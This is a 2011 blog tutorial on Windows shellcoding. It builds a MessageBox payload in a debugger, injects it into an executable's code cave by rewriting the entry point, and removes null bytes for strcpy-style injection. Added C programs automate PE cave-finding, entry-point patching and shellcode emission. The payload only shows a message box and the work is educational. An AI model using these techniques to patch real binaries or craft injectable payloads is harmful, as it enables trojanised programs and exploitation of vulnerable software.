Tuesday, May 31, 2011

simple windows shellcoding


shellcode is a small piece of code used as the payload in the exploitation of a software vulnerability. It is called "shellcode" because it typically starts a command shell from which the attacker can control the compromised machine, but any piece of code that performs a similar task can be called shellcode. Because the function of a payload is not limited to merely spawning a shell, some have suggested that the name shellcode is insufficient. However, attempts at replacing the term have not gained wide acceptance. Shellcode is commonly written in machine code.

Shellcode can either be local or remote, depending on whether it gives an attacker control over the machine it runs on (local) or over another machine through a network (remote).

An exploit will commonly inject a shellcode into the target process before or at the same time as it exploits a vulnerability to gain control over the program counter. The program counter is adjusted to point to the shellcode, after which it gets executed and performs its task. Injecting the shellcode is often done by storing the shellcode in data sent over the network to the vulnerable process, by supplying it in a file that is read by the vulnerable process or through the command line or environment in the case of local exploits.

In this post I want to show a simple way of making shellcode under the Windows operating system, using nothing more than a debugger.

Debuggers let us write and test shellcode quickly. Do you remember the EXE file injection method? In that method we must find a free area in the executable's code, called a code cave.
In the code cave we can insert assembly instructions and run them. After inserting our code, we change the instruction pointer so that it points to the beginning of our code.

I want to make a MessageBox shellcode that shows d3c0der!

To convert your message (the text you want the shellcode to show) to hex, you can use this site:
http://centricle.com/tools/ascii-hex/

This is an example of converting the word "d3c0der", byte by byte (all values hex): d = 64, 3 = 33, c = 63, 0 = 30, d = 64, e = 65, r = 72. These are exactly the values stored by the mov instructions below.

Here is a simple listing in assembly language (in the debugger's own notation, where user32.messageboxa stands for the address of MessageBoxA in the loaded user32.dll) that calls MessageBoxA and shows the word. The message is written one byte at a time to the stack just below EBP, and a pointer to it is passed as both the caption and the text. Two things to keep in mind: the listing writes no terminating zero byte after the last character at [ebp-1], so MessageBoxA keeps reading from [ebp] onward until it happens to hit a zero; and the address in mov eax,user32.messageboxa is resolved by the debugger for this process, so it is only valid on this machine and Windows build (and changes between runs on systems with ASLR). Real shellcode normally locates the function at run time instead of hardcoding it.

xor eax,eax                      ; clear the registers we use
xor ebx,ebx
xor ecx,ecx
xor edx,edx

mov byte ptr ss:[ebp-7],64       ; 'd'  build "d3c0der" at [ebp-7]..[ebp-1]
mov byte ptr ss:[ebp-6],33       ; '3'
mov byte ptr ss:[ebp-5],63       ; 'c'
mov byte ptr ss:[ebp-4],30       ; '0'
mov byte ptr ss:[ebp-3],64       ; 'd'
mov byte ptr ss:[ebp-2],65       ; 'e'
mov byte ptr ss:[ebp-1],72       ; 'r'  (no terminating 00 is written)

push 0                           ; uType = MB_OK  (stdcall: arguments pushed right to left)
lea ebx,dword ptr ss:[ebp-7]
push ebx                         ; lpCaption -> our string
lea ecx,dword ptr ss:[ebp-7]
push ecx                         ; lpText    -> our string
push 0                           ; hWnd = NULL
mov eax,user32.messageboxa       ; address resolved by the debugger for this process
call eax                         ; MessageBoxA(hWnd, lpText, lpCaption, uType)







Now it's time to find a code cave. You just need to look at the end of the code in the binary (scroll to the bottom of the disassembly): after the last real instruction the section is padded up to its file alignment with zero bytes, which the debugger disassembles as a run of ADD BYTE PTR DS:[EAX],AL. Those bytes are mapped and executable, so they can hold our code:


Now I insert my code into the code cave, one instruction at a time:


The first instruction I use is "xor eax,eax"
and its address is 01010D47 (we will use it to change EIP).

Take a look at the Registers window and note the address in EIP, the instruction pointer:


Follow that address in the disassembly:


and replace the instruction there with "JMP 01010D47". A JMP rel32 is five bytes long, so it overwrites the original instruction(s) at that address: the patched program no longer runs its original entry code, and because the cave ends with call eax, execution falls through into whatever bytes follow the cave once the message box is closed. For a quick test that is fine; for anything else, end the cave with a jump back to the original code or a clean exit.


Now run the program and you can see the d3c0der message. The patch lives only in the debugged process; to keep it, write the modified bytes back to the file (in OllyDbg: Copy to executable, then save).
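The find-the-cave and redirect-EIP steps above, done programmatically against a PE file instead of by eye in the debugger. This is an added example written for this page in C, not the post's own tooling: it parses the section table of a PE32 image, measures the run of zero padding at the end of each executable section (the same slack the post finds by scrolling to the end of the code), copies a payload into it, and overwrites the entry point with a JMP rel32 to the cave, as the post does by hand with JMP 01010D47. The image it works on is a minimal synthetic PE32 constructed inline (one .text section, entry point at RVA 0x1000, image base 0x01000000), not a real Windows binary, and the three-byte nop/nop/int3 payload is a constructed stand-in for the MessageBox code; all function and struct names are my own.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define PE_SIZE     0x400
#define SCN_EXECUTE 0x20000000u   /* IMAGE_SCN_MEM_EXECUTE */

struct cave  { uint32_t file_off, va, len; };                   /* free bytes: file offset, VA, length */
struct pehdr { uint32_t image_base, entry_rva; uint16_t nsec; const uint8_t *sec; };

static uint16_t rd16(const uint8_t *p) { return (uint16_t)(p[0] | p[1] << 8); }
static uint32_t rd32(const uint8_t *p) { return p[0] | p[1] << 8 | p[2] << 16 | (uint32_t)p[3] << 24; }
static void wr16(uint8_t *p, uint16_t v) { p[0] = (uint8_t)v; p[1] = (uint8_t)(v >> 8); }
static void wr32(uint8_t *p, uint32_t v) { for (int i = 0; i < 4; i++) p[i] = (uint8_t)(v >> 8 * i); }

/* Constructed stand-in for a real binary: a minimal PE32 with one executable .text
 * section holding 0x15 bytes of code (nop sled; ret) and zero padding up to 0x200. */
static void build_sample_pe(uint8_t *pe)
{
    memset(pe, 0, PE_SIZE);
    memcpy(pe, "MZ", 2);     wr32(pe + 0x3C, 0x40);             /* e_lfanew */
    memcpy(pe + 0x40, "PE\0\0", 4);
    wr16(pe + 0x46, 1);      wr16(pe + 0x54, 0xE0);             /* NumberOfSections, SizeOfOptionalHeader */
    wr16(pe + 0x58, 0x10B);                                      /* PE32 magic */
    wr32(pe + 0x68, 0x1000); wr32(pe + 0x74, 0x01000000);        /* AddressOfEntryPoint, ImageBase */
    uint8_t *s = pe + 0x138;                                     /* first IMAGE_SECTION_HEADER */
    memcpy(s, ".text", 5);
    wr32(s + 8, 0x15);   wr32(s + 12, 0x1000);                   /* VirtualSize, VirtualAddress */
    wr32(s + 16, 0x200); wr32(s + 20, 0x200);                    /* SizeOfRawData, PointerToRawData */
    wr32(s + 36, 0x60000020);                                    /* CODE | EXECUTE | READ */
    memset(pe + 0x200, 0x90, 0x14); pe[0x214] = 0xC3;            /* nop sled; ret */
}

/* Locate the NT headers and the section table; returns 0 if this is not a PE32. */
static int parse_pe(const uint8_t *pe, size_t size, struct pehdr *h)
{
    if (size < 0x40 || memcmp(pe, "MZ", 2) != 0) return 0;
    uint32_t nt = rd32(pe + 0x3C);
    if (nt + 24 > size || memcmp(pe + nt, "PE\0\0", 4) != 0 || rd16(pe + nt + 24) != 0x10B) return 0;
    h->nsec = rd16(pe + nt + 6);            h->sec = pe + nt + 24 + rd16(pe + nt + 20);
    h->entry_rva = rd32(pe + nt + 24 + 16); h->image_base = rd32(pe + nt + 24 + 28);
    return (size_t)(h->sec - pe) + 40u * h->nsec <= size;
}

/* Longest run of trailing zero bytes in an executable section: raw-file padding that
 * is mapped with the section but holds no code, the slack the post finds by scrolling. */
static int find_code_cave(const uint8_t *pe, size_t size, uint32_t min_len, struct cave *out)
{
    struct pehdr h; struct cave best = { 0, 0, 0 };
    if (!parse_pe(pe, size, &h)) return 0;
    for (uint16_t i = 0; i < h.nsec; i++) {
        const uint8_t *s = h.sec + 40 * i;
        uint32_t va = rd32(s + 12), raw = rd32(s + 16), off = rd32(s + 20), z = 0;
        if (!(rd32(s + 36) & SCN_EXECUTE) || off + raw > size) continue;
        while (z < raw && pe[off + raw - 1 - z] == 0) z++;
        if (z > best.len) { best.len = z; best.file_off = off + raw - z; best.va = h.image_base + va + raw - z; }
    }
    if (best.len < min_len) return 0;
    *out = best;
    return 1;
}

/* Copy payload into the cave and overwrite the five bytes at the entry point with a
 * JMP rel32 to it (what the post does by hand with JMP 01010D47). The original entry
 * instruction(s) are destroyed, so the payload must decide what runs next. */
static uint32_t redirect_entry_to_cave(uint8_t *pe, size_t size, const uint8_t *payload, size_t plen)
{
    struct pehdr h; struct cave c; uint32_t entry_off = 0;
    if (!parse_pe(pe, size, &h) || !find_code_cave(pe, size, (uint32_t)plen, &c)) return 0;
    for (uint16_t i = 0; i < h.nsec; i++) {                      /* entry RVA -> file offset */
        const uint8_t *s = h.sec + 40 * i;
        uint32_t va = rd32(s + 12), raw = rd32(s + 16), off = rd32(s + 20);
        if (h.entry_rva >= va && h.entry_rva + 5 <= va + raw) { entry_off = off + (h.entry_rva - va); break; }
    }
    if (entry_off == 0 || entry_off + 5 > size) return 0;
    memcpy(pe + c.file_off, payload, plen);
    pe[entry_off] = 0xE9;                                        /* JMP rel32 */
    wr32(pe + entry_off + 1, c.va - (h.image_base + h.entry_rva + 5)); /* target minus next instruction */
    return h.image_base + h.entry_rva;
}

/* Run the whole procedure on the sample image with a constructed nop/nop/int3 payload
 * and expose one byte of the patched file for inspection. */
uint8_t sample_patched_byte(size_t file_off)
{
    static uint8_t pe[PE_SIZE];
    const uint8_t payload[] = { 0x90, 0x90, 0xCC };
    build_sample_pe(pe);
    redirect_entry_to_cave(pe, sizeof pe, payload, sizeof payload);
    return pe[file_off];
}

int main(void)
{
    printf("entry bytes after patch: %02X %02X %02X %02X %02X\n", sample_patched_byte(0x200),
           sample_patched_byte(0x201), sample_patched_byte(0x202), sample_patched_byte(0x203), sample_patched_byte(0x204));
    return 0;
}
```

The checks that matter in practice are the ones the debugger hides: the cave must lie inside a section flagged IMAGE_SCN_MEM_EXECUTE, and the padding counted is the zero tail of SizeOfRawData, which arrives in memory with the rest of the section even though it lies past VirtualSize. The JMP displacement is relative to the end of the five-byte instruction (target minus entry+5), the arithmetic the debugger does for you when you type an absolute address; on the sample image the cave starts at file offset 0x215, sixteen bytes past the entry point, so the patch reads E9 10 00 00 00.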


Let's make it null-free!

Most shellcode is written without null bytes because it is usually injected into a target process through null-terminated strings. When a null-terminated string is copied, it is copied up to and including the first null, and the bytes of the shellcode after that are never processed. When shellcode that contains nulls is injected this way, only part of it arrives, so it cannot run successfully.

To produce null-free shellcode from shellcode that contains null bytes, substitute each instruction that contains a zero byte with instructions that have the same effect but are free of nulls. For example, on the IA-32 architecture one can replace this instruction:
push 0

which assembles to 6A 00 and so contains a zero as part of the literal, with these instructions:
xor ecx,ecx
push ecx

which assemble to 31 C9 51 and push the same value.

And our final shellcode, with both push 0 instructions replaced, is below. Before calling it null-free, look at the bytes in the debugger's hex pane: every instruction is now written without a zero, but the immediate in mov eax,user32.messageboxa is whatever address the debugger resolved, and if that address contains a 00 byte the listing still is not null-free. The code also assumes EBP points into writable stack memory and that user32.dll is already loaded in the target.

xor eax,eax
xor ebx,ebx
xor ecx,ecx
xor edx,edx
mov byte ptr ss:[ebp-7],64
mov byte ptr ss:[ebp-6],33
mov byte ptr ss:[ebp-5],63
mov byte ptr ss:[ebp-4],30
mov byte ptr ss:[ebp-3],64
mov byte ptr ss:[ebp-2],65
mov byte ptr ss:[ebp-1],72
xor ecx,ecx                      ; was: push 0  (uType)
push ecx
lea ebx,dword ptr ss:[ebp-7]
push ebx
lea ecx,dword ptr ss:[ebp-7]
push ecx
xor ecx,ecx                      ; was: push 0  (hWnd)
push ecx
mov eax,user32.messageboxa       ; check this immediate for 00 bytes
call eax
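The same listing, emitted as raw bytes and checked the way a practitioner would check it. This is an added example written for this page in C, not code from the original post: it generates the byte-by-byte store sequence for any message (the step done by hand above with the hex table), emits either the push 0 or the xor ecx,ecx / push ecx form of the argument pushes, reports where the first 00 byte sits, and runs the buffer through strcpy() to show how much of it would survive a null-terminated copy. The value 0x7E4507EA is an assumed placeholder for the address the debugger resolves for user32.messageboxa, not the address on any particular Windows build, and the function names are my own.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define SC_CAP 512

struct sc_report {
    size_t len;             /* bytes emitted */
    int    first_null;      /* index of the first 0x00 byte, or -1 if none */
    size_t survives_strcpy; /* bytes a strcpy()-style injection would deliver */
};

/* Emit the post's listing as raw x86 bytes: clear the registers, store the message one
 * byte at a time below EBP, push the four MessageBoxA arguments, load the address and
 * call it. Unlike the post's listing, a NUL terminator is stored at [ebp-1] (the text
 * occupies [ebp-(n+1)]..[ebp-2]) so MessageBoxA stops at the end of the text.
 * msgbox_addr is an assumed placeholder for the address the debugger resolves.
 * Returns the length written, or 0 if the message does not fit in a disp8. */
static size_t build_msgbox_shellcode(uint8_t *out, size_t cap, const char *msg,
                                     uint32_t msgbox_addr, int null_free)
{
    size_t n = strlen(msg), i, len = 0;
    int base = -(int)(n + 1);                 /* [ebp+base] holds the first character */
    if (n == 0 || n + 1 > 128) return 0;      /* disp8 range is -128..127 */
#define EMIT(...) do { const uint8_t b[] = { __VA_ARGS__ };                  \
        if (len + sizeof b > cap) return 0;                                  \
        memcpy(out + len, b, sizeof b); len += sizeof b; } while (0)
    EMIT(0x31, 0xC0);                         /* xor eax,eax */
    EMIT(0x31, 0xDB);                         /* xor ebx,ebx */
    EMIT(0x31, 0xC9);                         /* xor ecx,ecx */
    EMIT(0x31, 0xD2);                         /* xor edx,edx */
    for (i = 0; i < n; i++)                   /* mov byte ptr ss:[ebp+disp8],imm8 */
        EMIT(0xC6, 0x45, (uint8_t)(base + (int)i), (uint8_t)msg[i]);
    EMIT(0x88, 0x4D, 0xFF);                   /* mov byte ptr ss:[ebp-1],cl  (cl is still 0) */
    if (null_free) EMIT(0x31, 0xC9, 0x51);    /* xor ecx,ecx / push ecx */
    else           EMIT(0x6A, 0x00);          /* push 0                   -> uType = MB_OK */
    EMIT(0x8D, 0x5D, (uint8_t)base);          /* lea ebx,[ebp+base] */
    EMIT(0x53);                               /* push ebx                 -> lpCaption */
    EMIT(0x8D, 0x4D, (uint8_t)base);          /* lea ecx,[ebp+base] */
    EMIT(0x51);                               /* push ecx                 -> lpText */
    if (null_free) EMIT(0x31, 0xC9, 0x51);    /* xor ecx,ecx / push ecx */
    else           EMIT(0x6A, 0x00);          /* push 0                   -> hWnd = NULL */
    EMIT(0xB8, (uint8_t)msgbox_addr, (uint8_t)(msgbox_addr >> 8),
         (uint8_t)(msgbox_addr >> 16), (uint8_t)(msgbox_addr >> 24)); /* mov eax,imm32 */
    EMIT(0xFF, 0xD0);                         /* call eax */
#undef EMIT
    return len;
}

/* Index of the first 0x00 byte, or -1: where a null-terminated copy would stop. */
static int first_null(const uint8_t *sc, size_t len)
{
    for (size_t i = 0; i < len; i++)
        if (sc[i] == 0) return (int)i;
    return -1;
}

/* Deliver the buffer through strcpy(), as a string-handling bug in a target would,
 * and count how many bytes actually arrive. */
static size_t survives_strcpy(const uint8_t *sc, size_t len)
{
    char src[SC_CAP + 1], dst[SC_CAP + 1];
    memcpy(src, sc, len);
    src[len] = '\0';                          /* make the source a valid C string */
    strcpy(dst, src);
    return strlen(dst);
}

/* Build one variant of the shellcode for msg and measure it. */
struct sc_report report(const char *msg, uint32_t msgbox_addr, int null_free)
{
    uint8_t sc[SC_CAP];
    struct sc_report r;
    r.len = build_msgbox_shellcode(sc, sizeof sc, msg, msgbox_addr, null_free);
    r.first_null = first_null(sc, r.len);
    r.survives_strcpy = survives_strcpy(sc, r.len);
    return r;
}

int main(void)
{
    const char *variant[2] = { "push 0", "xor ecx,ecx / push ecx" };
    for (int v = 0; v < 2; v++) {
        uint8_t sc[SC_CAP];
        size_t len = build_msgbox_shellcode(sc, sizeof sc, "d3c0der", 0x7E4507EAu, v);
        printf("%s: %zu bytes, first null at %d\n", variant[v], len, first_null(sc, len));
        for (size_t i = 0; i < len; i++)
            printf("%02X%c", sc[i], (i % 16 == 15 || i + 1 == len) ? '\n' : ' ');
    }
    return 0;
}
```

Two things the output makes visible that the listing does not. The push 0 variant dies at byte 40 (the 00 of 6A 00), so a strcpy()-style injection delivers only the register clears and the string stores, never the call. The null-free variant is only null-free if the resolved MessageBoxA address has no zero byte, which is why the example takes the address as a parameter instead of baking it in. The terminator goes at [ebp-1] rather than [ebp] because mov byte ptr [ebp],cl needs an explicit zero displacement (88 4D 00) and would reintroduce the very byte we are removing.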


good luck!